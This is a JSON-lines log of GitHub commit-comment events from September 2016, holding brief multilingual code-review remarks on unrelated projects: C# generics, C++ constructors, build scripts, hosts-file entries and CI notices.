{"id":"4623260681","type":"CommitCommentEvent","actor":{"login":"kanshin87"},"repo":{"name":"kanshin87/Test"},"payload":{"comment":{"id":19188078,"position":null,"line":null,"path":null,"commit_id":"76368ae2308163550371f127c2445b853277fd5d","created_at":"2016-09-27T10:20:25Z","updated_at":"2016-09-27T10:20:25Z","body":"Test file"}},"created_at":"2016-09-27T10:20:25Z"}
{"id":"4623266541","type":"CommitCommentEvent","actor":{"login":"AlekseyLebedev"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19188090,"position":30,"line":30,"path":"PowerSpace/Editor/Main.cpp","commit_id":"9c6a35c326c40fb0b230a68551c1b656b2bc7b3f","created_at":"2016-09-27T10:21:40Z","updated_at":"2016-09-27T10:21:40Z","body":"Этот код пропал в следующем коммите"}},"created_at":"2016-09-27T10:21:40Z"}
{"id":"4623267746","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19188095,"position":null,"line":null,"path":null,"commit_id":"1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11","created_at":"2016-09-27T10:21:55Z","updated_at":"2016-09-27T10:21:55Z","body":"I also ended up not going my own way...I think you're right that the index is unnecessary, but I think that instead of doing .GetType() on the casted value, since the compiler will choose the most appropriate overload, we need to capture the Generic parameter's type right then and there in the implicit operator to not lost information.  It's entirely possible that someone does something like `OneOf<IBase, Child, Base, IOther, string>`, and as it stands, neither the is, nor GetType solution works, since this would cause the OneOfMatcher to execute multiple times.\r\n\r\nInstead, if we capture the implicit operator generic parameter at creation time, and switch on that, we're guaranteed to execute only once."}},"created_at":"2016-09-27T10:21:55Z"}
{"id":"4623270539","type":"CommitCommentEvent","actor":{"login":"Muqsit"},"repo":{"name":"Muqsit/Sell"},"payload":{"comment":{"id":19188103,"position":null,"line":null,"path":null,"commit_id":"54a34ea2c008b55b77f8fb64c1b72245e2128ef6","created_at":"2016-09-27T10:22:28Z","updated_at":"2016-09-27T10:22:28Z","body":"#11 "}},"created_at":"2016-09-27T10:22:28Z"}
{"id":"4623275406","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19188112,"position":78,"line":78,"path":"db/src/main/java/org/task/repositories/BalanceStatisticRepositoryImpl.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-27T10:23:30Z","updated_at":"2016-09-27T10:23:30Z","body":"Thanks for solving the task with balance caching. There are nifty details when running this in production, but on the high level it appears to accomplish the primary goal here."}},"created_at":"2016-09-27T10:23:30Z"}
{"id":"4623278441","type":"CommitCommentEvent","actor":{"login":"OlivierJaquemet"},"repo":{"name":"johndyer/mediaelement"},"payload":{"comment":{"id":19188116,"position":null,"line":null,"path":null,"commit_id":"d55d7b908c01b191527b5e987c6ff581aee4bb2b","created_at":"2016-09-27T10:24:07Z","updated_at":"2016-09-27T10:24:07Z","body":"Ok. Thank you ! I'll send your translation to our provider, they will be able to review it and I'll suggest them to  use the same terminology."}},"created_at":"2016-09-27T10:24:07Z"}
{"id":"4623282030","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":19188123,"position":10,"line":6,"path":"pkgbuild-introspection-git/PKGBUILD","commit_id":"023066b0a28a28419b869bc18d29b607c6a6bc31","created_at":"2016-09-27T10:24:51Z","updated_at":"2016-09-27T10:24:51Z","body":"所以那个比较pkgrel的地方认为1.0比1要小？"}},"created_at":"2016-09-27T10:24:51Z"}
{"id":"4623283158","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":19188125,"position":null,"line":null,"path":null,"commit_id":"38f0b7a300b905f790c6ef13ba9aff0438da68f4","created_at":"2016-09-27T10:25:07Z","updated_at":"2016-09-27T10:25:07Z","body":"But most important is to fix #19 "}},"created_at":"2016-09-27T10:25:07Z"}
{"id":"4623287016","type":"CommitCommentEvent","actor":{"login":"brnv"},"repo":{"name":"brnv/dotfiles"},"payload":{"comment":{"id":19188135,"position":11,"line":11,"path":"bin/m4a-to-mp3","commit_id":"02e72f1fb2cf28df3b635b712fedf97ed95d04ac","created_at":"2016-09-27T10:25:55Z","updated_at":"2016-09-27T10:25:55Z","body":"yep, thx"}},"created_at":"2016-09-27T10:25:55Z"}
{"id":"4623291027","type":"CommitCommentEvent","actor":{"login":"moskupols"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19188140,"position":6,"line":6,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon.h","commit_id":"42428b98da9e42b678b7486c8f082566f291345b","created_at":"2016-09-27T10:26:43Z","updated_at":"2016-09-27T10:26:43Z","body":"Передача по значению -- не обязательно копирование.\r\nhttp://stackoverflow.com/questions/7592630/is-pass-by-value-a-reasonable-default-in-c11\r\nДобавил std::move в конструктор."}},"created_at":"2016-09-27T10:26:43Z"}
{"id":"4623294370","type":"CommitCommentEvent","actor":{"login":"fabian"},"repo":{"name":"c5labs/concrete5-composer"},"payload":{"comment":{"id":19188150,"position":null,"line":null,"path":null,"commit_id":"70657a789fc9d6743c9f88ce9548950dece9c081","created_at":"2016-09-27T10:27:26Z","updated_at":"2016-09-27T10:27:26Z","body":"🙂"}},"created_at":"2016-09-27T10:27:26Z"}
{"id":"4623297344","type":"CommitCommentEvent","actor":{"login":"mikerhyner"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19188156,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T10:28:02Z","updated_at":"2016-09-27T10:28:02Z","body":"OK, thanks for your quick response. What kind of problems exactly? Should I really avoid to add that back to \"00_nameserver.conf\"? We use i-mscp 1.3.3 with PHP-FPM implementation. I thought it could be confusing for our customers when there's a \"File not found.\" message appearing on wrong php script called, specially when they have added a custom error message (but perhaps you're right as not many people type a url like this...)."}},"created_at":"2016-09-27T10:28:02Z"}
{"id":"4623298086","type":"CommitCommentEvent","actor":{"login":"BadDaemon"},"repo":{"name":"aphisitworachorch/android_device_huawei_kiwi"},"payload":{"comment":{"id":19188158,"position":null,"line":null,"path":null,"commit_id":"c08bba1060d419783a44f4558beaf5efb0f4f75c","created_at":"2016-09-27T10:28:12Z","updated_at":"2016-09-27T10:28:12Z","body":"if (platform != ANDROID_TARGET, PROP_VALUE_MAX) <- why did you keep PROP_VALUE_MAX here? \r\nsame with \"if (hwsim[..]\""}},"created_at":"2016-09-27T10:28:12Z"}
{"id":"4623298841","type":"CommitCommentEvent","actor":{"login":"stohrendorf"},"repo":{"name":"opentomb/OpenTomb"},"payload":{"comment":{"id":19188161,"position":null,"line":null,"path":null,"commit_id":"8d44a30b433706b1f753057e7cd2db75269a3fae","created_at":"2016-09-27T10:28:21Z","updated_at":"2016-09-27T10:28:21Z","body":"@TeslaRus That \"rounding trouble\" is a wrong assumption, as \"float\" is considered to be a \"numeric superset\" of integer types, thus the compiler implicitly converts the nominator also to \"float\", which makes the cast unnecessary."}},"created_at":"2016-09-27T10:28:21Z"}
{"id":"4623300002","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19188162,"position":null,"line":null,"path":null,"commit_id":"2aac83173bbf0f92e0737b596988034aec3edbe0","created_at":"2016-09-27T10:28:35Z","updated_at":"2016-09-27T10:28:35Z","body":"@ElbertoOne That's for sure! :-)\n"}},"created_at":"2016-09-27T10:28:35Z"}
{"id":"4623301037","type":"CommitCommentEvent","actor":{"login":"smoki3"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":19188163,"position":null,"line":null,"path":null,"commit_id":"ea0dbee3c93fa221b8c7d3b6c566d635eae2afd2","created_at":"2016-09-27T10:28:47Z","updated_at":"2016-09-27T10:28:47Z","body":"I tried the todays rcbugfix. Fist i use abl on a corexy machine. I use the abl linear. While probing the machine moves in the y axis. Exactly the probing length. The second problem I found. Is that the settings lines for ABL are there twice. "}},"created_at":"2016-09-27T10:28:47Z"}
{"id":"4623301350","type":"CommitCommentEvent","actor":{"login":"nuxwin"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19188164,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T10:28:51Z","updated_at":"2016-09-27T10:28:51Z","body":"One of our user was unable to access its owncloud software instance (customer site) when this directive was present."}},"created_at":"2016-09-27T10:28:51Z"}
{"id":"4623302231","type":"CommitCommentEvent","actor":{"login":"Saisimon"},"repo":{"name":"Saisimon/tip"},"payload":{"comment":{"id":19188165,"position":null,"line":null,"path":null,"commit_id":"e8c3425494425c6bb998432d54d58f60a4e78338","created_at":"2016-09-27T10:29:01Z","updated_at":"2016-09-27T10:29:01Z","body":"Good"}},"created_at":"2016-09-27T10:29:01Z"}
{"id":"4623302610","type":"CommitCommentEvent","actor":{"login":"MathiasTG"},"repo":{"name":"Sofiefreja/Terning"},"payload":{"comment":{"id":19188166,"position":null,"line":null,"path":null,"commit_id":"4338fb889646ab7f9ddab42ca10310cf2f607783","created_at":"2016-09-27T10:29:07Z","updated_at":"2016-09-27T10:29:07Z","body":"Jeg har ingen ide om hvordan jeg gør det her....\r\n"}},"created_at":"2016-09-27T10:29:07Z"}
{"id":"4623304039","type":"CommitCommentEvent","actor":{"login":"IAMTJW"},"repo":{"name":"mybatis/mybatis-3"},"payload":{"comment":{"id":19188169,"position":null,"line":null,"path":null,"commit_id":"19e287f444162abaf3956f821e966774906c78cf","created_at":"2016-09-27T10:29:25Z","updated_at":"2016-09-27T10:29:25Z","body":"add the BigIntegerTypeHandler "}},"created_at":"2016-09-27T10:29:25Z"}
{"id":"4623304759","type":"CommitCommentEvent","actor":{"login":"yomybaby"},"repo":{"name":"dsteam1/appprj"},"payload":{"comment":{"id":19188173,"position":null,"line":null,"path":null,"commit_id":"ac29e80f6f2faa8b7cd7ba688e4105b44db192ce","created_at":"2016-09-27T10:29:35Z","updated_at":"2016-09-27T10:29:35Z","body":"great!!!"}},"created_at":"2016-09-27T10:29:35Z"}
{"id":"4623306483","type":"CommitCommentEvent","actor":{"login":"yomybaby"},"repo":{"name":"dsteam1/appprj"},"payload":{"comment":{"id":19188176,"position":4,"line":4,"path":"README.md","commit_id":"ac29e80f6f2faa8b7cd7ba688e4105b44db192ce","created_at":"2016-09-27T10:29:57Z","updated_at":"2016-09-27T10:29:57Z","body":"여기는 왜 넣은거야?"}},"created_at":"2016-09-27T10:29:57Z"}
{"id":"4623314634","type":"CommitCommentEvent","actor":{"login":"YuanShuai726"},"repo":{"name":"lypeer/wechat-weapp-gank"},"payload":{"comment":{"id":19188193,"position":null,"line":null,"path":null,"commit_id":"30fa9b1e91a26bed240455f79e2120b90d7facaf","created_at":"2016-09-27T10:31:32Z","updated_at":"2016-09-27T10:31:32Z","body":"id不能用啦？"}},"created_at":"2016-09-27T10:31:32Z"}
{"id":"4623317038","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188197,"position":null,"line":null,"path":null,"commit_id":"f622ddc2733b3a0361156d5231c6df6f43ab1a2b","created_at":"2016-09-27T10:32:03Z","updated_at":"2016-09-27T10:32:03Z","body":"*.google-analytics.com\r\n已经解析到谷歌中国 为什么还要解析回国外？"}},"created_at":"2016-09-27T10:32:03Z"}
{"id":"4623319817","type":"CommitCommentEvent","actor":{"login":"ianrrees"},"repo":{"name":"EvilMav/python-ivi"},"payload":{"comment":{"id":19188205,"position":369,"line":369,"path":"ivi/siglent/siglentSDG2000X.py","commit_id":"5c5bcd3cc889e975fcde7fc862d3d4a2c8f81c8d","created_at":"2016-09-27T10:32:39Z","updated_at":"2016-09-27T10:32:39Z","body":"It might be a bit clearer to re-write this as:\r\n\r\nwaveformMappingInv = {v : k for k,v in StandardWaveformMapping.items()}\r\nvalue = waveformMappingInv[resp.lower()]"}},"created_at":"2016-09-27T10:32:39Z"}
{"id":"4623343552","type":"CommitCommentEvent","actor":{"login":"bit-shifter"},"repo":{"name":"caplin/caplin-dev-tools"},"payload":{"comment":{"id":19188260,"position":null,"line":null,"path":null,"commit_id":"940c90b1844111a3b4fea86290fc247a62186a6d","created_at":"2016-09-27T10:37:51Z","updated_at":"2016-09-27T10:37:51Z","body":"Am I right to infer that the product suffix exists to indicate that proxy target has yet to be made generic?"}},"created_at":"2016-09-27T10:37:51Z"}
{"id":"4623344656","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"dok1qq/IMDBParser"},"payload":{"comment":{"id":19188261,"position":39,"line":116,"path":"IMDBParser/Parser.cs","commit_id":"2be3c5cb202ebde71b2de54a9d28456590ed0b5d","created_at":"2016-09-27T10:38:06Z","updated_at":"2016-09-27T10:38:06Z","body":"Зачем здесь тысячи foreach? Метод showInformationOfFilm все равно перетирает записи на форме."}},"created_at":"2016-09-27T10:38:06Z"}
{"id":"4623345887","type":"CommitCommentEvent","actor":{"login":"the-braveknight"},"repo":{"name":"RehabMan/Intel-NUC-DSDT-Patch"},"payload":{"comment":{"id":19188264,"position":null,"line":null,"path":null,"commit_id":"8c40056634b520f0e6fb3517c4b83381dba19409","created_at":"2016-09-27T10:38:22Z","updated_at":"2016-09-27T10:38:22Z","body":"So how will the graphics work if you don't install FakePCIID!? o.O"}},"created_at":"2016-09-27T10:38:22Z"}
{"id":"4623348101","type":"CommitCommentEvent","actor":{"login":"ashdnazg"},"repo":{"name":"spring/spring"},"payload":{"comment":{"id":19188270,"position":null,"line":null,"path":null,"commit_id":"17986986dd6671db8944e4f97aa559a5b301f3e5","created_at":"2016-09-27T10:38:52Z","updated_at":"2016-09-27T10:38:52Z","body":"oops, sorry about that :("}},"created_at":"2016-09-27T10:38:52Z"}
{"id":"4623353919","type":"CommitCommentEvent","actor":{"login":"bonkey"},"repo":{"name":"zalando-incubator/atlas-ios"},"payload":{"comment":{"id":19188284,"position":8,"line":20,"path":"AtlasUI/AtlasUI/AddressListTableViewDelegate.swift","commit_id":"b84f35c349aba129ccfeae716297c0484305fd43","created_at":"2016-09-27T10:40:06Z","updated_at":"2016-09-27T10:40:06Z","body":"@ahmed-shehata Several things:\r\n\r\n1. Let's assume `didSet` is considered harmful, use it as the last resort or just don't use it.\r\n2. Don't change anything magically inside, especially it was just assigned, because you're stealing data and lying to another class. Oh, `didSet` seems the side problem of this, no?\r\n3. Ifelsism is bad religion. You should go with any faction of declarativism. Just pass what you want to pass, and get what you want to get. Some other more popular religion tells _But let your communication be, Yea, yea; Nay, nay: for whatsoever is more than these cometh of evil._\r\n4. And last: isn't it infinite loop? Oh, didn't I just mention `didSet` is harmful?"}},"created_at":"2016-09-27T10:40:06Z"}
{"id":"4623358446","type":"CommitCommentEvent","actor":{"login":"nadenislamarre"},"repo":{"name":"substring/recalbox-buildroot"},"payload":{"comment":{"id":19188293,"position":null,"line":null,"path":null,"commit_id":"65d32f4fe9acda0ca72e4ac71139bebacb7983a5","created_at":"2016-09-27T10:41:07Z","updated_at":"2016-09-27T10:41:07Z","body":"Can you list files from /etc/modprobe.d that you didn't put please ?\r\nI think that we can be strictly identical for that directory (and it's easier to maintain)\r\nI thing that alsa.conf (or a similar name) is required to fix some sound modules parameters too."}},"created_at":"2016-09-27T10:41:07Z"}
{"id":"4623359545","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"dok1qq/IMDBParser"},"payload":{"comment":{"id":19188295,"position":46,"line":123,"path":"IMDBParser/Parser.cs","commit_id":"2be3c5cb202ebde71b2de54a9d28456590ed0b5d","created_at":"2016-09-27T10:41:22Z","updated_at":"2016-09-27T10:41:22Z","body":"CodeStyle. На соседних строчках string - по разно написаны. :("}},"created_at":"2016-09-27T10:41:22Z"}
{"id":"4623360003","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19188296,"position":null,"line":null,"path":null,"commit_id":"230a66f1b0cfbb117e9960b0c0dd40250c6aba4d","created_at":"2016-09-27T10:41:28Z","updated_at":"2016-09-27T10:41:28Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36163/testReport/) for this commit**"}},"created_at":"2016-09-27T10:41:28Z"}
{"id":"4623361794","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188299,"position":null,"line":null,"path":null,"commit_id":"801406d6891c6e873b4e20656044ba5a53a3ce81","created_at":"2016-09-27T10:41:50Z","updated_at":"2016-09-27T10:41:50Z","body":"204.79.197.217 onedrive.live.com\r\n134.170.107.72 storage.live.com\r\n134.170.30.15 people.live.com\r\n134.170.30.15 profile.live.com\r\n134.170.104.24 skyapi.onedrive.live.com\r\n23.41.136.70 auth.gfx.ms\r\n23.53.65.164 p.sfx.ms"}},"created_at":"2016-09-27T10:41:50Z"}
{"id":"4623364256","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19188306,"position":null,"line":null,"path":null,"commit_id":"1586270209fe034ca620fca5b4af1853e1551bce","created_at":"2016-09-27T10:42:24Z","updated_at":"2016-09-27T10:42:24Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#eUNnNC5DSoS1-Y2TK4KJvQ"}},"created_at":"2016-09-27T10:42:24Z"}
{"id":"4623367254","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19188313,"position":7,"line":4,"path":"js/script.js","commit_id":"27e49db62308c9c4c0733223987bec9b44777329","created_at":"2016-09-27T10:43:06Z","updated_at":"2016-09-27T10:43:06Z","body":"czemu deklarujesz zmienną animal od nowa?"}},"created_at":"2016-09-27T10:43:06Z"}
{"id":"4623369278","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188318,"position":null,"line":null,"path":null,"commit_id":"1fbc5088eb9b585d91ee0d3f32f8d1a855768a0f","created_at":"2016-09-27T10:43:31Z","updated_at":"2016-09-27T10:43:31Z","body":"…你这个commit我表示看不懂"}},"created_at":"2016-09-27T10:43:31Z"}
{"id":"4623372808","type":"CommitCommentEvent","actor":{"login":"frazor"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":19188326,"position":49,"line":131,"path":"docsite/rst/playbooks2.rst","commit_id":"8333b4eb03885e3c17ed3c778e91c39c9fbe0ba6","created_at":"2016-09-27T10:44:18Z","updated_at":"2016-09-27T10:44:18Z","body":"Is this example still valid in playbooks? I'd like to iterate a lineinfile task where ip is included, but can't quite figure out how to get a list of IPs to work with. I'm on ansible 2.1.x\r\nWould it be possible to clarify in which context these examples can be used, and provide a similar example for tasks if this isn't for that?"}},"created_at":"2016-09-27T10:44:18Z"}
{"id":"4623373583","type":"CommitCommentEvent","actor":{"login":"Cronick"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19188331,"position":null,"line":null,"path":null,"commit_id":"3b65a69f74309069dc4f9e9af816ce58ca0d3652","created_at":"2016-09-27T10:44:32Z","updated_at":"2016-09-27T10:44:32Z","body":"You are right about that @GabrielTK. Have fixed now."}},"created_at":"2016-09-27T10:44:32Z"}
{"id":"4623374076","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19188333,"position":11,"line":8,"path":"js/script.js","commit_id":"27e49db62308c9c4c0733223987bec9b44777329","created_at":"2016-09-27T10:44:38Z","updated_at":"2016-09-27T10:44:38Z","body":"wywołujesz tutaj `replace` ale zobacz w [dokumentacji](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace), że `The replace() method returns a new string` czyli dostałeś nowy string z zamienionymi Papugami, ale nic z nim nie zrobiłeś => dlatego zmienna `text` jest nadal stara (z papugami, a nie słoniami)"}},"created_at":"2016-09-27T10:44:38Z"}
{"id":"4623374291","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19188334,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T10:44:40Z","updated_at":"2016-09-27T10:44:40Z","body":"a stopped transcoding does **not** free the used tuner.\r\na stopped streaming does free the used tuner."}},"created_at":"2016-09-27T10:44:40Z"}
{"id":"4623376766","type":"CommitCommentEvent","actor":{"login":"Firefishy"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19188339,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T10:45:14Z","updated_at":"2016-09-27T10:45:14Z","body":"If it is any easier, I can create a dedicate email at @osmfoundation.org or @openstreetmap that goes to whomever we desire... Alternatively we can get it sent to a OTRS ticket system section (as used by CWG)."}},"created_at":"2016-09-27T10:45:14Z"}
{"id":"4623385235","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19188359,"position":6,"line":6,"path":"src/Makefile.am","commit_id":"d6c5596c68bfa8117f97f6a9499ba13641c52cfa","created_at":"2016-09-27T10:47:14Z","updated_at":"2016-09-27T10:47:14Z","body":"We hsould add a '/' between $(DESTDIR) and $(BINDIR)? not sure if that's directly what the user gives in which case $(DESTDIR) can be without a trailing '/'"}},"created_at":"2016-09-27T10:47:14Z"}
{"id":"4623388826","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19188371,"position":5,"line":9,"path":"autogen.sh","commit_id":"eb6225634889d72f434c8c1e3b3bf432fe7f8fc8","created_at":"2016-09-27T10:48:02Z","updated_at":"2016-09-27T10:48:02Z","body":"That hunk needs to go away, no?"}},"created_at":"2016-09-27T10:48:02Z"}
{"id":"4623391618","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19188376,"position":null,"line":null,"path":null,"commit_id":"eb6225634889d72f434c8c1e3b3bf432fe7f8fc8","created_at":"2016-09-27T10:48:41Z","updated_at":"2016-09-27T10:48:41Z","body":"No init.c -> hyperstart.c rename needed?"}},"created_at":"2016-09-27T10:48:41Z"}
{"id":"4623392773","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19188377,"position":5,"line":8,"path":"configure.ac","commit_id":"eb6225634889d72f434c8c1e3b3bf432fe7f8fc8","created_at":"2016-09-27T10:48:56Z","updated_at":"2016-09-27T10:48:56Z","body":"That should go away as well I think."}},"created_at":"2016-09-27T10:48:56Z"}
{"id":"4623393024","type":"CommitCommentEvent","actor":{"login":"MarcusTwist"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19188378,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-27T10:49:00Z","updated_at":"2016-09-27T10:49:00Z","body":"Thanks!! that worked 👍 "}},"created_at":"2016-09-27T10:49:00Z"}
{"id":"4623395449","type":"CommitCommentEvent","actor":{"login":"bebef1987"},"repo":{"name":"mozilla/moz-grid-config"},"payload":{"comment":{"id":19188391,"position":null,"line":null,"path":null,"commit_id":"9b527586a5e97fc7f2043d4eac8a8da0f7d91867","created_at":"2016-09-27T10:49:33Z","updated_at":"2016-09-27T10:49:33Z","body":"@davehunt  I tried to download a selenium version that has no sufix and failed.\r\nIs there a way to do that with this code or should we use a older commit\r\n\r\n"}},"created_at":"2016-09-27T10:49:33Z"}
{"id":"4623395635","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19188392,"position":18,"line":57,"path":"configure.ac","commit_id":"eb6225634889d72f434c8c1e3b3bf432fe7f8fc8","created_at":"2016-09-27T10:49:36Z","updated_at":"2016-09-27T10:49:36Z","body":"It's usually to call these kind of things \"ENABLE_DAEMON\""}},"created_at":"2016-09-27T10:49:36Z"}
{"id":"4623395810","type":"CommitCommentEvent","actor":{"login":"joerick"},"repo":{"name":"WhistleMaster/tingbot-apps"},"payload":{"comment":{"id":19188393,"position":null,"line":null,"path":null,"commit_id":"cb864587e6052b2ea1e728a12ab8445b8b543f2c","created_at":"2016-09-27T10:49:38Z","updated_at":"2016-09-27T10:49:38Z","body":"👍  fancy doing another release with these guys and we can get them online? :)\r\n"}},"created_at":"2016-09-27T10:49:38Z"}
{"id":"4623399813","type":"CommitCommentEvent","actor":{"login":"pldin601"},"repo":{"name":"sadovnik/converter"},"payload":{"comment":{"id":19188401,"position":11,"line":14,"path":"src/Converter.php","commit_id":"665e3b7744b859b6578863ce064b6c955e48882a","created_at":"2016-09-27T10:50:30Z","updated_at":"2016-09-27T10:50:30Z","body":"как-то так: makeError\r\nты же по сути делаешь объект, а не берешь откуда-то"}},"created_at":"2016-09-27T10:50:30Z"}
{"id":"4623406446","type":"CommitCommentEvent","actor":{"login":"IvanSlaev"},"repo":{"name":"PepoMilushew/Bash"},"payload":{"comment":{"id":19188411,"position":null,"line":null,"path":null,"commit_id":"30fc5fbe6bd961ac0a60ce5924f16f27f045fb57","created_at":"2016-09-27T10:52:01Z","updated_at":"2016-09-27T10:52:01Z","body":"It's ok!"}},"created_at":"2016-09-27T10:52:01Z"}
{"id":"4623406679","type":"CommitCommentEvent","actor":{"login":"johanstokking"},"repo":{"name":"TheThingsNetwork/node-app-lib"},"payload":{"comment":{"id":19188412,"position":6,"line":81,"path":"src/client.js","commit_id":"5f296387a93f4543122dd4f8079074c8fa7a6a87","created_at":"2016-09-27T10:52:04Z","updated_at":"2016-09-27T10:52:04Z","body":"Currently, when there's no decoder and thus no `payload_fields`, the `payload_raw` is a Buffer, otherwise it's a base64 string. It should always be a Buffer, regardless of whether there are fields or not. Note that there is always a `payload_raw`."}},"created_at":"2016-09-27T10:52:04Z"}
{"id":"4623409298","type":"CommitCommentEvent","actor":{"login":"suryapriyaa"},"repo":{"name":"Thomas-kj/psg-ptc"},"payload":{"comment":{"id":19188417,"position":null,"line":null,"path":null,"commit_id":"a2fc5df7f6e183d6239389845d536f41f0b31647","created_at":"2016-09-27T10:52:41Z","updated_at":"2016-09-27T10:52:41Z","body":"need more files\r\n"}},"created_at":"2016-09-27T10:52:41Z"}
{"id":"4623413814","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19188432,"position":36,"line":74,"path":"wcfsetup/install/files/lib/system/importer/UserAvatarImporter.class.php","commit_id":"93f79ece589101149e5fd133b534d8705c159ffc","created_at":"2016-09-27T10:53:42Z","updated_at":"2016-09-27T10:53:42Z","body":"What's the purpose of this?"}},"created_at":"2016-09-27T10:53:42Z"}
{"id":"4623415816","type":"CommitCommentEvent","actor":{"login":"AN1234"},"repo":{"name":"AN1234/ProgrammingAssignment2"},"payload":{"comment":{"id":19188438,"position":1,"line":1,"path":"cachematrix.R","commit_id":"5b062e16b0e8cc06395dbbb7f7e54cbc6d84b060","created_at":"2016-09-27T10:54:09Z","updated_at":"2016-09-27T10:54:09Z","body":"Cache the inverse of a matrix\r\n\r\n"}},"created_at":"2016-09-27T10:54:09Z"}
{"id":"4623417203","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19188441,"position":6,"line":521,"path":"wcfsetup/install/files/lib/system/WCFSetup.class.php","commit_id":"f5aa0bfd9e9d499b3287c30fa708794a17e20a47","created_at":"2016-09-27T10:54:27Z","updated_at":"2016-09-27T10:54:27Z","body":"Shouldn't you remove the first 2 characters?"}},"created_at":"2016-09-27T10:54:27Z"}
{"id":"4623417664","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188442,"position":null,"line":null,"path":null,"commit_id":"2cc67731a7f7b25140cb557d1c87d9966811de3c","created_at":"2016-09-27T10:54:33Z","updated_at":"2016-09-27T10:54:33Z","body":"我发现你的merge我经常看的莫名其妙的\r\n应该属于无脑系列的吧\r\nApple iTunes在中国用的网宿/蓝讯，本身没有找他配置https，所以不支持，而不是如这位所说的什么DNS污染"}},"created_at":"2016-09-27T10:54:33Z"}
{"id":"4623418488","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"sadovnik/converter"},"payload":{"comment":{"id":19188446,"position":11,"line":14,"path":"src/Converter.php","commit_id":"665e3b7744b859b6578863ce064b6c955e48882a","created_at":"2016-09-27T10:54:45Z","updated_at":"2016-09-27T10:54:45Z","body":"`makeError` лучше, но непонятно, какая именно ошибка делается. Может лучше `makeUnknownExtentionError`?"}},"created_at":"2016-09-27T10:54:45Z"}
{"id":"4623419555","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19188448,"position":6,"line":6,"path":"src/Makefile.am","commit_id":"d6c5596c68bfa8117f97f6a9499ba13641c52cfa","created_at":"2016-09-27T10:54:59Z","updated_at":"2016-09-27T10:54:59Z","body":"This will error out when BINARY_NAME=init"}},"created_at":"2016-09-27T10:54:59Z"}
